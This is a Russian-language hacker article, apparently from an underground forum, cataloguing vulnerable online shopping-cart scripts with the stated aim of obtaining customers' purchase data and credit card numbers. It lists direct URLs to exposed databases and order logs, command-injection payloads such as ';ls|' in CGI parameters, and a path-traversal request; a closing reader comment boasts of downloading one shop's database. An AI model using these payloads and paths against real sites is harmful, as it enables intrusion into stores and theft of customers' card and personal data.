Уязвимости онлайн магазинов В этой статье я расскажу о нескольких уязвимых корзинах и способах, используя которые, можно получить инфу о покупках и соответственно кредитных картах. Начнем... Первым номером у нас идет корзинка под названием SalesCart (www.salescart.com) Обладает приятной особенностью 8) Удаленный зарегистрированный пользователь может получить доступ к персональным данным других пользователей (типа номеров кредитных карточек =). Эта информация хранится в файле shop.mdb, который доступен любому пользователю. ClickCartPro Законченное решение для электронных магазинов. Система позволяет управлять складом, отслеживать заказы, управлять показом баннеров и делать многое-многое другое. В стандартной конфигурации программа хранит базы данных открытыми на сервере. http://www.server.com/data/site/admin_user.db http://www.server.com/cp/data/site/admin_user.db http://www.server.com/data/cp/site/admin_user.db База admin_user содержит пароли администраторов сайта. =) MetaLinks MetaCart2.sql Система покупок, основанная на ASP + MS SQL. Уязвимость в программе позволяет атакующему получить доступ к базе данных. http://www.server.com/database/metacart.mdbhttp://www.server.com/metacart/database/metacart.mdb WebDiscount eShop Позволяет исполнять команды. http://www.server.com/cgi-bin/eshop.pl?seite=;ls| Shopping Cart Позволяет исполнять команды. http://www.server.com/cgi-local/shop.pl/page=;ls| QuikStore Удобное решение для совершения покупок с помощью интернет карточек. Уязвимость в программе позволяет получить доступ к файлам сервера. http://www.server.com/cgi-bin/quikstore.cgi?page=../quikstore.cgi html&cart_id= Конфигурация хранится в файле: quikstore.cfg Order Form v1.2 Открытая для просмотра директория : /Orders/ , order/ , /orders/ , etc... Открытая информация о заказах: order_log_v12.dat (иногда order_log.dat) Seaside Enterprises EZMall 2000 Исполняемый файл: mall2000.cgi Открытая для просмотра директория: /mall_log_files/ Открытая информация о заказах: order.log PDGSoft's PDG Shopping Cart 1.5 Исполняемый файл: shopper.cgi Открытая для просмотра директория: /PDG_Cart/ Открытая информация о заказах: order.log Конфигурация хранится в файле: shopper.conf Mercantec's SoftCart Исполняемый файл: SoftCart.exe Открытая для просмотра директория: /orders/ и /pw/ Открытая информация о заказах: /orders/*.olf Конфигурация хранится в файле: /pw/storemgr.pw Perlshop Исполняемый файл: SoftCart.exe Открытая для просмотра директория: /store/customers/ и /store/temp_customers/ Открытая информация о заказах: Файлы с цифровыми именами (8 знаков) WebShop Исполняемый файл: WebShop.cgi Открытая информация о заказах: /WebShop/templates/cc.txt и /WebShop/logs/cc.txt И вот буквально только что , пока я тут писал о корзинках, мой батник скачал свежую порцию багтрэка и там... Ышо одна дырявая корзинка =) Alan Ward's A-Cart (http://www.alanward.net/acart/) - система осуществления покупок через Web, разработанная в ASP для Windows систем. Файл базы данных acart2_0.mdb хранится в Web директории и доступен для загрузки удаленным пользователям. В файле содержится регистрационная информация пользователей совершивших покупку (Имя, адрес, номера кредитных карт). Ну вот для первого раза хватит =) Автор: 1dt.w0lf
Нет...сам лично скачал с какогото буржуйского сайта их базу шопа...кажись вот этот скрипт магаза - MetaLinks MetaCart